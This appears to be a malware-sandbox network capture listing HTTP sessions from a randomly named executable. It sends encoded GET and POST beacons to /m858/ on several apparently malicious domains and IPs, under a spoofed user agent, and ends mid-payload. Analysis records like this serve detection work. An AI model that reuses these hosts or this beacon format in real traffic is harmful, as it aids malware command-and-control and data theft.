                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.1149739207.244.126.150802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:52.199393988 CET447OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:52.361907959 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:52 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.1149740162.240.81.18802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:57.885279894 CET725OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 54 6a 64 71 69 6d 4a 77 65 71 37 49 33 54 48 50 6f 68 4a 7a 61 38 47 6f 33 58 75 41 6c 4f 6a 2b 59 4e 6c 2f 41 44 54 42 54 67 50 6d 75 6b 6f 6f 42 2b 4f 55 73 30 56 46 30 68 47 53 6e 42 71 56 45 5a 67 79 56 72 47 46 70 4c 7a 4a 71 35 77 71 5a 75 4a 38 6d 41 76 70 35 37 4a 36 31 4c 6e 58 61 55 33 67 42 36 71 63 34 34 66 37 56 76 78 76 69 57 45 4a 66 76 51 2b 70 31 62 53 34 79 33 66 51 6c 30 34 71 6a 48 6a 64 64 71 75 4c 58 54 6e 4d 2b 4b 50 4e 2f 56 4d 30 43 4c 62 32 66 76 4a 4e 6d 50 38 6c 77 3d 3d
                                                                                                                      Data Ascii: yRV=2qGyi+XoXiouTjdqimJweq7I3THPohJza8Go3XuAlOj+YNl/ADTBTgPmukooB+OUs0VF0hGSnBqVEZgyVrGFpLzJq5wqZuJ8mAvp57J61LnXaU3gB6qc44f7VvxviWEJfvQ+p1bS4y3fQl04qjHjddquLXTnM+KPN/VM0CLb2fvJNmP8lw==
                                                                                                                      Dec 7, 2023 15:54:58.081706047 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:57 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 15:54:58.081760883 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 15:54:58.081835985 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.1149741162.240.81.18802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:00.599354029 CET745OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 53 41 31 71 76 6c 68 77 62 4b 37 48 72 44 48 50 68 42 4a 6f 61 38 4b 6f 33 54 57 51 6c 38 33 2b 59 6f 42 2f 42 43 54 42 51 67 50 6d 6d 45 6f 68 65 75 4f 50 73 30 52 4e 30 67 4b 53 6e 41 4b 56 45 59 38 79 56 59 75 4b 6f 62 7a 50 6c 5a 77 6f 55 4f 4a 38 6d 41 76 70 35 2f 68 51 31 4c 66 58 64 6e 76 67 41 59 43 44 31 59 66 34 53 76 78 76 6f 47 45 4e 66 76 51 51 70 77 36 35 34 77 2f 66 51 67 49 34 71 57 71 31 57 64 71 6f 46 33 53 52 66 76 4c 56 49 64 59 4c 71 77 44 56 69 6f 72 48 49 7a 6a 76 69 44 70 76 4b 61 4b 63 32 6e 36 2b 39 4b 5a 50 44 43 75 59 56 4f 6f 3d
                                                                                                                      Data Ascii: yRV=2qGyi+XoXiouSA1qvlhwbK7HrDHPhBJoa8Ko3TWQl83+YoB/BCTBQgPmmEoheuOPs0RN0gKSnAKVEY8yVYuKobzPlZwoUOJ8mAvp5/hQ1LfXdnvgAYCD1Yf4SvxvoGENfvQQpw654w/fQgI4qWq1WdqoF3SRfvLVIdYLqwDViorHIzjviDpvKaKc2n6+9KZPDCuYVOo=
                                                                                                                      Dec 7, 2023 15:55:00.795011997 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:00 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 15:55:00.795094013 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 15:55:00.795110941 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.1149742162.240.81.18802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:55:03.322160959 CET1758OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 53 41 31 71 76 6c 68 77 62 4b 37 48 72 44 48 50 68 42 4a 6f 61 38 4b 6f 33 54 57 51 6c 38 76 2b 59 2b 64 2f 41 67 37 42 52 67 50 6d 73 6b 6f 6b 65 75 50 58 73 30 70 42 30 67 32 6b 6e 45 36 56 57 71 59 79 58 70 75 4b 68 62 7a 50 6e 5a 77 70 5a 75 4a 74 6d 45 4c 6c 35 37 4e 51 31 4c 66 58 64 6d 66 67 48 4b 71 44 6d 49 66 37 56 76 78 7a 69 57 45 6c 66 76 59 6d 70 77 4f 50 37 45 7a 66 51 41 34 34 35 45 79 31 62 64 71 71 43 33 53 5a 66 71 53 4c 49 65 73 32 71 77 33 7a 69 76 66 48 49 33 57 72 37 51 4e 70 53 2f 66 71 30 43 61 33 67 4b 63 54 54 68 69 61 55 61 48 48 52 69 30 72 34 6a 6b 62 6e 37 6b 58 33 74 2f 62 4c 38 2b 75 4a 4a 54 58 58 79 36 67 6a 66 64 36 53 47 46 4c 36 72 33 78 78 65 67 53 32 36 33 7a 6e 68 45 64 45 33 2b 5a 43 59 77 35 38 78 45 30 59 6d 63 71 38 67 4d 6c 35 66 6b 76 44 70 66 71 68 35 37 34 74 4d 52 56 51 4c 30 69 32 49 44 44 67 5a 56 4e 38 6c 44 30 48 52 44 5a 75 72 38 66 6a 37 58 52 65 70 69 47 71 42 31 4d 65 53 66 5a 45 6e 7a 77 4f 63 44 68 74 69 48 53 39 4a 69 63 67 50 32 4f 37 38 73 59 47 59 6f 45 58 35 38 59 67 61 72 59 7a 4f 6c 6a 48 74 48 62 56 33 70 59 4a 35 37 32 62 44 45 4b 66 4e 61 79 58 46 46 6b 78 65 6e 70 77 54 45 50 66 49 4e 64 71 63 50 6b 6f 50 62 57 6b 51 55 52 59 77 30 66 39 7a 47 62 36 7a 7a 4e 4f 4d 79 36 33 42 4b 6c 71 56 55 51 5a 6c 66 50 56 33 73 39 4c 72 59 45 57 32 56 49 6d 68 5a 58 63 6b 33 33 49 7a 77 46 4f 53 69 5a 6f 36 30 71 48 63 38 33 64 50 50 35 55 51 61 41 6c 54 55 51 34 51 48 52 55 5a 65 4c 77 6b 30 36 42 78 69 47 74 41 6d 2b 35 4d 2b 5a 53 65 76 56 71 4f 41 78 73 58 79 75 56 4d 6d 6c 33 70 72 41 46 79 46 65 72 50 48 6b 44 72 5a 4a 53 33 6a 6c 76 33 58 4c 6f 50 74 77 43 43 33 41 4f 73 7a 36 2b 41 64 4d 76 62 70 53 72 2b 32 34 39 58 52 50 6c 6d 4a 56 58 53 4b 78 4d 71 34 65 38 71 51 77 42 67 6d 65 33 55 54 72 48 6c 67 39 2b 77 6a 57 62 6b 48 64 38 61 33 76 52 35 65 65 72 52 38 39 37 4a 79 6d 58 7a 49 43 43 51 33 59 38 64 67 6e 5a 6d 45 78 42 52 4f 75 42 41 42 61 32 4b 38 58 58 70 4a 65 79 4c 44 59 33 42 4d 6a 6c 76 30 70 54 73 59 35 4e 38 47 72 51 5a 6d 47 45 73 77 74 4f 36 33 49 49 2f 6b 41 6d 37 51 4f 4b 46 44 6e 70 47 56 6d 74 32 46 62 6c 30 4b 44 50 6c 30 47 78 4d 6c 4b 52 71 30 52 42 78 41 76 35 72 67 4f 75 4b 47 30 75 6f 79 2f 46 79 43 51 4b 62 4a 4c 2b 5a 66 36 41 42 6f 55 4a 35 62 48 52 41 78 4e 69 42 67 30 69 44 56 2b 42 52 6c 33 43 55 6b 79 32 59 61 42 63 4a 4f 6e 61 72 43 65 55 6f 33 61 78 52 55 6f 75 46 37 57 67 6d 59 42 73 34 74 6f 4e 31 51 68 50 66 4e 66 47 4e 74 64 42 54 72 77 4d 7a 44 61 7a 53 53 76 45 65 4a 64 41 43 6b 62 42 6a 79 47 31 43 4a 2f 62 4c 2f 38 77 68 57 71 46 49 49 6a 79 42 4a 5a 50 47 37 66 41 73 68 30 46 38 35 41 61 69 45 65 6e 64 76 6e 6e 2f 79 59 66 68 6e 56 2f 76 39 70 4e 34 51 69 78 68 39 56 53 35 36 6a 6d 64 4c 58 4c 2f 78 6b 53 57 32 4e 6c 56 4c 4f 33 67 4a 42 54 53 6e 71 